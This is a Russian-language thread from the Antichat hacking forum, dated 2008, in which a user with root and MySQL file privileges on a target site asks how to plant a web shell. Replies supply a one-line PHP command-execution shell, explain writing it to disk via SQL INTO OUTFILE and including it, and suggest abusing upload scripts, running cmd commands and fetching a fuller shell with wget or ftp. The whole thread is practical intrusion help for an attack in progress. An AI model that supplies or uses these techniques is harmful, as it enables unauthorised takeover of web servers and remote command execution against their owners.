HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

File_priv
  #1  
Старый 08.09.2008, 19:52
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами: 9483229

Репутация: 1160
По умолчанию File_priv

Простите за глупый вопрос, как нужно заливать шелл,когда у меня есть:
1)root-права
2)c://www/www/index.php (знаю путь)
3)ну естественно File_priv=Y
Как?.LOAD_FILE (можно посмотреть конфиги ,но не робит ,)но что-то не получаеться
Или как узнать префикс? (там самописный сайт,локалка) =\
 
Ответить с цитированием

  #2  
Старый 08.09.2008, 20:25
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами: 9483229

Репутация: 1160
По умолчанию

Фишка в том,что отклюбчен удаленный инклуд,
Warning: include() [function.include]: URL file-access is disabled in the server configuration
оцтой =\
Хотя если через бд выполнять не include.... а <? echo "lol"; ?> into.... то файл создаеться и все выполняеться,ДАЙТЕ самый маленький шелл плиз))
 
Ответить с цитированием

  #3  
Старый 08.09.2008, 20:42
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

самый маленький шелл это
<? system($_GET[c]) ?>
записываешь через инто аутфайл и инклудишь

Вообще если у тебя есть локальный инклуд, попробуй найти на сайте какой нить скрипт заливки картинок, аватаров в форуме например
 
Ответить с цитированием

  #4  
Старый 09.09.2008, 05:12
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами: 9483229

Репутация: 1160
По умолчанию

Цитата:
Сообщение от Spyder  
самый маленький шелл это
<? system($_GET[c]) ?>
записываешь через инто аутфайл и инклудишь

Вообще если у тебя есть локальный инклуд, попробуй найти на сайте какой нить скрипт заливки картинок, аватаров в форуме например
Воспользовался конструкцие как у Спайдера,но не умею юзать я его,к сожалению =\
Как там директорию посмотреть ...php?c=-ls la?
Как с этого залить полноценный шелл? wget?
zДайте пожалуйста полную констркуцию запроса =)
ЗЫ: .php?c= echo "qwe"; -сработало xD

Последний раз редактировалось DDoSька; 09.09.2008 в 05:14..
 
Ответить с цитированием

  #5  
Старый 08.09.2008, 21:09
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

PHP код:
<? system($_GET); ?>
так правильнее.
 
Ответить с цитированием

  #6  
Старый 09.09.2008, 05:21
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
С нами: 10467109

Репутация: 222
По умолчанию

Цитата:
Как там директорию посмотреть ...php?c=-ls la?
Если там ОС винда то .php?c=dir,так же смд камандами пытайся сделать все что хочешь=)
 
Ответить с цитированием

  #7  
Старый 09.09.2008, 05:29
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами: 9483229

Репутация: 1160
По умолчанию

Цитата:
Сообщение от Extremal  
Если там ОС винда то .php?c=dir,так же смд камандами пытайся сделать все что хочешь=)
теперь я немного опнял...
то есть если я наберу ?c=regedit,то у него вылезит на столе реестр?Что еще посоветуете...кроме "dir" ?
 
Ответить с цитированием

  #8  
Старый 09.09.2008, 05:45
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

ftp
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...